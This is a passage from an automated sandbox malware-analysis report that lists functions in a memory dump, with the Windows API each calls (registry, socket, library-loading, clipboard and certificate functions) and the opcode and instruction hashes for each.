                                                                      • Opcode Fuzzy Hash: 5e06d0418a5f2f527fedca44abfb07999581b951ad38093a64e3103a7ce18ecf
                                                                      • Instruction Fuzzy Hash: 93219175409784AFE7128B25DC51FA2FFB8EF07314F0984DBE9849B293D224A949C771
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04E0024E, Relevance: 1.6, APIs: 1, Instructions: 75registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RegQueryValueExW.KERNEL32(?,00000E2C,EE35994E,00000000,00000000,00000000,00000000), ref: 04E002E0
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: QueryValue
                                                                      • String ID:
                                                                      • API String ID: 3660427363-0
                                                                      • Opcode ID: 48ef71202bbc80761a682a5f5b61bb6a7b5da23199ca1eb9ee27a8111fbd4753
                                                                      • Instruction ID: b172b9071d73cd0b1dcdf6884c7dc0c5b677a7df0b2a00e35101891767c597a1
                                                                      • Opcode Fuzzy Hash: 48ef71202bbc80761a682a5f5b61bb6a7b5da23199ca1eb9ee27a8111fbd4753
                                                                      • Instruction Fuzzy Hash: 5C219D72505344AFD722CF55DC44F67FFF8EF0A310F08849AEA859B292D264E548CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04E01085, Relevance: 1.6, APIs: 1, Instructions: 74COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • getsockname.WS2_32(?,00000E2C,EE35994E,00000000,00000000,00000000,00000000), ref: 04E0110B
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: getsockname
                                                                      • String ID:
                                                                      • API String ID: 3358416759-0
                                                                      • Opcode ID: 87445ca65801413878bbcd37091697b41c19c56c4b6628ba4cbfb3e473f86e27
                                                                      • Instruction ID: b1cf805f3524b8e7523edf169dc72e467872fe0a1308effac49bf41b5b86670a
                                                                      • Opcode Fuzzy Hash: 87445ca65801413878bbcd37091697b41c19c56c4b6628ba4cbfb3e473f86e27
                                                                      • Instruction Fuzzy Hash: 5821B371508384AFE712CF65DC44F96FFA8EF46310F08C4ABEA449F292D264A548CB71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04E0477F, Relevance: 1.6, APIs: 1, Instructions: 74libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(?,00000E2C), ref: 04E0481F
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: LibraryLoad
                                                                      • String ID:
                                                                      • API String ID: 1029625771-0
                                                                      • Opcode ID: a94a0f6bfba9eacd6964e6d43ab9bb9aa839f505104aae82a1904b16a1e525dc
                                                                      • Instruction ID: be6d27ec9b71a905d8e129a64d146c161fad8819bd202659aac591579dd4f3be
                                                                      • Opcode Fuzzy Hash: a94a0f6bfba9eacd6964e6d43ab9bb9aa839f505104aae82a1904b16a1e525dc
                                                                      • Instruction Fuzzy Hash: 4321DA71449384AFE722CB14DD45F52FFA8DF46720F1880DAEE445F293D268A949C771
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04E03C06, Relevance: 1.6, APIs: 1, Instructions: 73registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RegOpenKeyExW.KERNEL32(?,00000E2C), ref: 04E03C7A
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: Open
                                                                      • String ID:
                                                                      • API String ID: 71445658-0
                                                                      • Opcode ID: c20c0c9f5d8370299cba6618a82247f169aa2455ca300dd8619d7f08e04d16f0
                                                                      • Instruction ID: 7063b8393dc9e7f5ea2ae8603602760a0438d0651d7fe4d1f70e2916f52915af
                                                                      • Opcode Fuzzy Hash: c20c0c9f5d8370299cba6618a82247f169aa2455ca300dd8619d7f08e04d16f0
                                                                      • Instruction Fuzzy Hash: 2921A171500304AFE7209F55DC84F6BFBA8EF44720F14885BED44DB281D270A4588A71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04E04FE4, Relevance: 1.6, APIs: 1, Instructions: 73COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 04E0505E
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: LookupPrivilegeValue
                                                                      • String ID:
                                                                      • API String ID: 3899507212-0
                                                                      • Opcode ID: 8f6a635db0c8c38b59f92e30158e5a21367b7bdfedc22056917d990a95f80eaf
                                                                      • Instruction ID: ab499a4127f341a1aaf0bbd1a4ec4b8c82a4a8edc9a11eb4d3347ebc9d89fef0
                                                                      • Opcode Fuzzy Hash: 8f6a635db0c8c38b59f92e30158e5a21367b7bdfedc22056917d990a95f80eaf
                                                                      • Instruction Fuzzy Hash: 72218371509380AFD712CF65DC45B56BFE8EF06224F0884EAE985CB252D274E848CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04E062F2, Relevance: 1.6, APIs: 1, Instructions: 72encryptionCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CertVerifyCertificateChainPolicy.CRYPT32(?,00000E2C,EE35994E,00000000,00000000,00000000,00000000), ref: 04E0637A
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CertCertificateChainPolicyVerify
                                                                      • String ID:
                                                                      • API String ID: 3930008701-0
                                                                      • Opcode ID: 897bef1217a45216f139149acca73c7d308a3a3027f7243d60b186808a740268
                                                                      • Instruction ID: 8e16ff40b4e4e04f73dd82cfb8ad283e0b8068645547eb20cd9918f6b64c8fa4
                                                                      • Opcode Fuzzy Hash: 897bef1217a45216f139149acca73c7d308a3a3027f7243d60b186808a740268
                                                                      • Instruction Fuzzy Hash: 5821AF71008380AFE7228F64DC44F66FFA8EF46310F0884ABEE449B252C365A449CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04E00986, Relevance: 1.6, APIs: 1, Instructions: 72synchronizationCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateMutexW.KERNEL32(?,?), ref: 04E009F9
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CreateMutex
                                                                      • String ID:
                                                                      • API String ID: 1964310414-0
                                                                      • Opcode ID: 92dac264de070fbfefaaab333bee8b263331c067ae7ac90cdb6e29091b40bc5f
                                                                      • Instruction ID: a1d1720bdb59aacdb3fb72d784f8acff2081f1d3571e1ca1de4c102226a6b0fe
                                                                      • Opcode Fuzzy Hash: 92dac264de070fbfefaaab333bee8b263331c067ae7ac90cdb6e29091b40bc5f
                                                                      • Instruction Fuzzy Hash: 7D21AF71500200AFF720DF65D845BA6FBE8EF44320F14C46AEE889B282D670E844CA61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04E03742, Relevance: 1.6, APIs: 1, Instructions: 72networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • WSAIoctl.WS2_32(?,00000E2C,EE35994E,00000000,00000000,00000000,00000000), ref: 04E037BD
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: Ioctl
                                                                      • String ID:
                                                                      • API String ID: 3041054344-0
                                                                      • Opcode ID: e44c802b207b27dca63e0984a58ee5fb6e33337a935c2fb0f6572aa5be66aad4
                                                                      • Instruction ID: f559d776c46d4f1c1bd72318bc1119705b27f41235dd52394e8dd70e89b37daf
                                                                      • Opcode Fuzzy Hash: e44c802b207b27dca63e0984a58ee5fb6e33337a935c2fb0f6572aa5be66aad4
                                                                      • Instruction Fuzzy Hash: D6216AB1100604EFEB218F55DC84FA7BBE8EF49710F18856AEE459B291D270E449CB71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04E01169, Relevance: 1.6, APIs: 1, Instructions: 70COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ioctlsocket.WS2_32(?,00000E2C,EE35994E,00000000,00000000,00000000,00000000), ref: 04E011E7
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: ioctlsocket
                                                                      • String ID:
                                                                      • API String ID: 3577187118-0
                                                                      • Opcode ID: 279d7b1c2612159f54d28549fe6d8cd0252f2b5b4bbdabaa38dd983c9e6e2897
                                                                      • Instruction ID: f977cc60deb0799c073150ac1203c6863718bcf35810f33ed48fb39af9f068a9
                                                                      • Opcode Fuzzy Hash: 279d7b1c2612159f54d28549fe6d8cd0252f2b5b4bbdabaa38dd983c9e6e2897
                                                                      • Instruction Fuzzy Hash: CB219371409384AFEB12CF65DC44F56FFB8EF46310F0884ABEA849F252D275A548C762
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04E06691, Relevance: 1.6, APIs: 1, Instructions: 68windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • PeekMessageW.USER32(?,?,?,?,?), ref: 04E06708
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: MessagePeek
                                                                      • String ID:
                                                                      • API String ID: 2222842502-0
                                                                      • Opcode ID: 2b8d66dee4de6b732eeddc4439d26152ef8bcb86665bac33f2085713e3a9b0b9
                                                                      • Instruction ID: b7c11a9e268f0dee805ed08361bea4d84d4c81cedae3a8dce0e2ef90c7018ddb
                                                                      • Opcode Fuzzy Hash: 2b8d66dee4de6b732eeddc4439d26152ef8bcb86665bac33f2085713e3a9b0b9
                                                                      • Instruction Fuzzy Hash: 7821A176409780AFDB228F25DC40B52FFB4EF07224F0884CEED858F263D265A958DB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04E0126A, Relevance: 1.6, APIs: 1, Instructions: 68networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: accept
                                                                      • String ID:
                                                                      • API String ID: 3005279540-0
                                                                      • Opcode ID: b9117b87fa1c03fa4436f027b07f2105ac7e01888917ac2c81eca8605744e3db
                                                                      • Instruction ID: 8914692d52c491f388a90e107cafcdb75017908df6f1880aa0d265b5a53bcc6c
                                                                      • Opcode Fuzzy Hash: b9117b87fa1c03fa4436f027b07f2105ac7e01888917ac2c81eca8605744e3db
                                                                      • Instruction Fuzzy Hash: D421A170500240AFE721DF25DC45FA6FBE8EF04320F14846AEE849F281D375A548CA71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04E0050A, Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • OpenFileMappingW.KERNELBASE(?,?), ref: 04E00575
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: FileMappingOpen
                                                                      • String ID:
                                                                      • API String ID: 1680863896-0
                                                                      • Opcode ID: c15d239c6732c91ff5a2db2983c6731ddf745abcfd1047948b009e99ddabad18
                                                                      • Instruction ID: 831b4a237e18667e9138706496f81f35c3c3a1a29ded14817f34a6883cbb7dcd
                                                                      • Opcode Fuzzy Hash: c15d239c6732c91ff5a2db2983c6731ddf745abcfd1047948b009e99ddabad18
                                                                      • Instruction Fuzzy Hash: 3021AE71900600AFE721DF65DC45FA6FBE8EF05320F14846AED858B281E275F548CB71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04E0060A, Relevance: 1.6, APIs: 1, Instructions: 67fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: FileView
                                                                      • String ID:
                                                                      • API String ID: 3314676101-0
                                                                      • Opcode ID: 12d4e589ebf618c81de74a31b01f7634e2a671296060adb071c090df5136ec35
                                                                      • Instruction ID: ddee948739489bb76b18c7666f552ba6e3b361d4792da5c0a57bb6d53c1ee50f
                                                                      • Opcode Fuzzy Hash: 12d4e589ebf618c81de74a31b01f7634e2a671296060adb071c090df5136ec35
                                                                      • Instruction Fuzzy Hash: F021DE71500200EFE721CF55EC84FA6FBE8EF09320F14845EEA889B641D3B1B448CB62
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04E053F6, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • K32GetModuleInformation.KERNEL32(?,00000E2C,EE35994E,00000000,00000000,00000000,00000000), ref: 04E0545A
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: InformationModule
                                                                      • String ID:
                                                                      • API String ID: 3425974696-0
                                                                      • Opcode ID: b6c624df675057cc3d694fdf7a95f3c0f1ceb80008a5444ad95274b85d1fbe58
                                                                      • Instruction ID: 9d8fc0a0ec2d7609a79f680a6787281f91b510336848a89e326680e5465671a3
                                                                      • Opcode Fuzzy Hash: b6c624df675057cc3d694fdf7a95f3c0f1ceb80008a5444ad95274b85d1fbe58
                                                                      • Instruction Fuzzy Hash: 6E11AF71500204EFEB20CF25DC85FA6BBA8EF45321F14C46AEE45CB291D674E4488B71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04E0312E, Relevance: 1.6, APIs: 1, Instructions: 67networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetNetworkParams.IPHLPAPI(?,00000E2C,EE35994E,00000000,00000000,00000000,00000000), ref: 04E031AC
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: NetworkParams
                                                                      • String ID:
                                                                      • API String ID: 2134775280-0
                                                                      • Opcode ID: 5727bc59c4388389234bcccc2cf0aa071857b8c414f02a0319828538c85e14b9
                                                                      • Instruction ID: d9cdcf6f4f2a56ec146e38f09e662e59e898a8ad9e106b5c5332b3ffde873e5e
                                                                      • Opcode Fuzzy Hash: 5727bc59c4388389234bcccc2cf0aa071857b8c414f02a0319828538c85e14b9
                                                                      • Instruction Fuzzy Hash: F921B471409384AFD7228B55DC45F96FFB8EF46320F08C5DBED849B292C264A548CB72
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04E04116, Relevance: 1.6, APIs: 1, Instructions: 67networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 04E04192
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: Connect
                                                                      • String ID:
                                                                      • API String ID: 3144859779-0
                                                                      • Opcode ID: 1e9ed50a829cc823e02c262ab9cc2256d127ce291960810eef5ccefd16bd23dd
                                                                      • Instruction ID: 447456cf426839c01d9f143e4b75240efd8180f55abec7d96219833e65457eac
                                                                      • Opcode Fuzzy Hash: 1e9ed50a829cc823e02c262ab9cc2256d127ce291960810eef5ccefd16bd23dd
                                                                      • Instruction Fuzzy Hash: FF216271408384AFDB228F55DC44F52FFF4EF4A210F0885DAEE858B2A2D375A958DB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04E03916, Relevance: 1.6, APIs: 1, Instructions: 66registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RegOpenCurrentUser.KERNEL32(?,00000E2C), ref: 04E03979
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CurrentOpenUser
                                                                      • String ID:
                                                                      • API String ID: 1571386571-0
                                                                      • Opcode ID: 1c828be62162f120ecaba1e045722ba3dffe9f54752b06d0b0c644f9553cd82f
                                                                      • Instruction ID: f1175814a1466f7e2a8e981afd1e76434f73e0b3a01c016633a92c31b0136841
                                                                      • Opcode Fuzzy Hash: 1c828be62162f120ecaba1e045722ba3dffe9f54752b06d0b0c644f9553cd82f
                                                                      • Instruction Fuzzy Hash: F011D071500204AFFB21DF25DC84FABFB9CEF45720F14846BEE449B285D274A4498AB5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04E0026E, Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RegQueryValueExW.KERNEL32(?,00000E2C,EE35994E,00000000,00000000,00000000,00000000), ref: 04E002E0
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: QueryValue
                                                                      • String ID:
                                                                      • API String ID: 3660427363-0
                                                                      • Opcode ID: feaca539ff0c284ff7da5d58737ab1907a92b6172c5d71d2bf099a850e124c0a
                                                                      • Instruction ID: a30de9f69a91074c7f62d3976682e362422d98e7dbf4b3932cffaaefb748316f
                                                                      • Opcode Fuzzy Hash: feaca539ff0c284ff7da5d58737ab1907a92b6172c5d71d2bf099a850e124c0a
                                                                      • Instruction Fuzzy Hash: D511AC72500604EFEB21CF55DC81FA7FBE8EF09720F04C46AEA459B292D664E448CB71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04E01B95, Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LoadLibraryShim.MSCOREE(?,?,?,?), ref: 04E01C11
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: LibraryLoadShim
                                                                      • String ID:
                                                                      • API String ID: 1475914169-0
                                                                      • Opcode ID: 024738e59e83393a855c68f3c43cef6a2f5901d3b984b832a7b1c215c4468493
                                                                      • Instruction ID: 22dde4993697dd7d8402e951c42edbd549e3ff82e4e8a22fdd07e8a5668af066
                                                                      • Opcode Fuzzy Hash: 024738e59e83393a855c68f3c43cef6a2f5901d3b984b832a7b1c215c4468493
                                                                      • Instruction Fuzzy Hash: FB2193B5509384AFD722CF15DC84B62FFE8EF06314F09808AED848B293D265E508CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04E03B1A, Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RegNotifyChangeKeyValue.KERNEL32(?,00000E2C,EE35994E,00000000,00000000,00000000,00000000), ref: 04E03B84
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: ChangeNotifyValue
                                                                      • String ID:
                                                                      • API String ID: 3933585183-0
                                                                      • Opcode ID: e0a859017e4d23968d5caace357a90013105b427ac41d242e3636ac543bc5cf7
                                                                      • Instruction ID: 532fb4177947ad5d788f356dba18f0525473dab754a8d34515d5a4d71f4f10b4
                                                                      • Opcode Fuzzy Hash: e0a859017e4d23968d5caace357a90013105b427ac41d242e3636ac543bc5cf7
                                                                      • Instruction Fuzzy Hash: 7C11BE71400604EEEB21DF65DC84FABFBACEF04324F14886BEE459B241D674A848CBB1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04E00C56, Relevance: 1.6, APIs: 1, Instructions: 64timeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetProcessTimes.KERNEL32(?,00000E2C,EE35994E,00000000,00000000,00000000,00000000), ref: 04E00CB5
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: ProcessTimes
                                                                      • String ID:
                                                                      • API String ID: 1995159646-0
                                                                      • Opcode ID: 214d0b67e2d6a5bf5e99331862e4a56e479634f7992408c885614b5d7b1061b4
                                                                      • Instruction ID: 895e60e12a8ca8f67cc63d89aa540b50c6a297e633281414e68d57e317806b43
                                                                      • Opcode Fuzzy Hash: 214d0b67e2d6a5bf5e99331862e4a56e479634f7992408c885614b5d7b1061b4
                                                                      • Instruction Fuzzy Hash: DE11D071500200EFEB218F65DC84FAAFBA8EF05320F14C4ABEE499B251D670A4498B71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04E06236, Relevance: 1.6, APIs: 1, Instructions: 63encryptionCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CertVerifyCertificateChainPolicy.CRYPT32(?,00000E2C,EE35994E,00000000,00000000,00000000,00000000), ref: 04E06292
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CertCertificateChainPolicyVerify
                                                                      • String ID:
                                                                      • API String ID: 3930008701-0
                                                                      • Opcode ID: 5d6b2607ac02e284c888573eaecde61dd0735bc9fe5f0e98fe7343914d019851
                                                                      • Instruction ID: e1b4ecff970322d56554e9853fd69c289a96b8dc2584e385e61f8429c0127438
                                                                      • Opcode Fuzzy Hash: 5d6b2607ac02e284c888573eaecde61dd0735bc9fe5f0e98fe7343914d019851
                                                                      • Instruction Fuzzy Hash: A411C471500204EFEB218F65DC45FA7FBA8EF45320F14C46BEE459B241D674A459CB71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04E0136E, Relevance: 1.6, APIs: 1, Instructions: 63networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • WSAEventSelect.WS2_32(?,00000E2C,EE35994E,00000000,00000000,00000000,00000000), ref: 04E013D2
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: EventSelect
                                                                      • String ID:
                                                                      • API String ID: 31538577-0
                                                                      • Opcode ID: e92c5ac7396c8c661d05cff292147403f6a794b1479fbaa0f9f2ea1ef4031977
                                                                      • Instruction ID: 41b121326f00ce6a6de481d8a399ac51f5b43e366e00347324a7273151c8de0c
                                                                      • Opcode Fuzzy Hash: e92c5ac7396c8c661d05cff292147403f6a794b1479fbaa0f9f2ea1ef4031977
                                                                      • Instruction Fuzzy Hash: 0F11DD72500204EEEB21CF65CC84FABFBACEF45320F14C46BEA489B241D674A4488BB1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04E0530E, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • K32EnumProcessModules.KERNEL32(?,00000E2C,EE35994E,00000000,00000000,00000000,00000000), ref: 04E0536A
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: EnumModulesProcess
                                                                      • String ID:
                                                                      • API String ID: 1082081703-0
                                                                      • Opcode ID: f1b060491bfabd705ae647804b78b7d560fa76b69c39eca885e044c5060ee5cd
                                                                      • Instruction ID: 3b567f124a6138b39c88e0d51191af7092515571b332cd0e07010125de45d68e
                                                                      • Opcode Fuzzy Hash: f1b060491bfabd705ae647804b78b7d560fa76b69c39eca885e044c5060ee5cd
                                                                      • Instruction Fuzzy Hash: B311B271500204EFEB21DF65DC85FABFBA8EF45320F14C46BEE459B281D6B4A4488B71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04E010AA, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • getsockname.WS2_32(?,00000E2C,EE35994E,00000000,00000000,00000000,00000000), ref: 04E0110B
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: getsockname
                                                                      • String ID:
                                                                      • API String ID: 3358416759-0
                                                                      • Opcode ID: 36157c1474356582d3527daca69206e23df8684a585cc1771acf634d40e83336
                                                                      • Instruction ID: c8aabe152fc49a350d1afdb7b404cea2c643d10684098dd19778d4a43cc185db
                                                                      • Opcode Fuzzy Hash: 36157c1474356582d3527daca69206e23df8684a585cc1771acf634d40e83336
                                                                      • Instruction Fuzzy Hash: 4711DD71500204EFE720CF55DC80FA6FBA8EF05720F14C56BEE089F282D675A448CA71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04E001AA, Relevance: 1.6, APIs: 1, Instructions: 62comclipboardCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • OleGetClipboard.OLE32(?,00000E2C,?,?), ref: 04E00221
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: Clipboard
                                                                      • String ID:
                                                                      • API String ID: 220874293-0
                                                                      • Opcode ID: f527a40420b4f03e5ca28705a2a7a1d1676b18ae432a17d38c57b96a28494694
                                                                      • Instruction ID: 4b6e495e7466aec3b3ddc495306efe6a0af1d615d9e4b1864b4c673edb978323
                                                                      • Opcode Fuzzy Hash: f527a40420b4f03e5ca28705a2a7a1d1676b18ae432a17d38c57b96a28494694
                                                                      • Instruction Fuzzy Hash: F211B671504340AFD3128B16DC41F36FFB8EFC6A20F15819AED448B652D225B915CBB2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04E04CDA, Relevance: 1.6, APIs: 1, Instructions: 61registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RegSetValueExW.KERNELBASE(?,00000E2C,EE35994E,00000000,00000000,00000000,00000000), ref: 04E04D44
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: Value
                                                                      • String ID:
                                                                      • API String ID: 3702945584-0
                                                                      • Opcode ID: 3ba96d0dc45bb1e52ad135838e5e1123104720e613f452960856c72a8ec52778
                                                                      • Instruction ID: 95f073f124550910426944936ba4ddfc2276010aaa78403e436fe8f416596d83
                                                                      • Opcode Fuzzy Hash: 3ba96d0dc45bb1e52ad135838e5e1123104720e613f452960856c72a8ec52778
                                                                      • Instruction Fuzzy Hash: 94119A72500604FEEB218F55DD80FA7FBA8EF08720F14C46AEE559A291D6B0A448CBB1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04E00032, Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • setsockopt.WS2_32(?,00000E2C,EE35994E,00000000,00000000,00000000,00000000), ref: 04E00091
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: setsockopt
                                                                      • String ID:
                                                                      • API String ID: 3981526788-0
                                                                      • Opcode ID: 0000973a93029c7eb4c58d1c8357a3df5ef6d5ff954e40fb24a0fe2030beb646
                                                                      • Instruction ID: 56fdac61ee7548de32e3ad403f3148282743ecaba34919dcef0f25e48ab73016
                                                                      • Opcode Fuzzy Hash: 0000973a93029c7eb4c58d1c8357a3df5ef6d5ff954e40fb24a0fe2030beb646
                                                                      • Instruction Fuzzy Hash: 7311BF71500204EFEB21CF55DC40FA6FFA8EF45324F14C86BEE499B251D275A4488BB1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04E065E4, Relevance: 1.6, APIs: 1, Instructions: 60windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • PostMessageW.USER32(?,?,?,?), ref: 04E06651
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: MessagePost
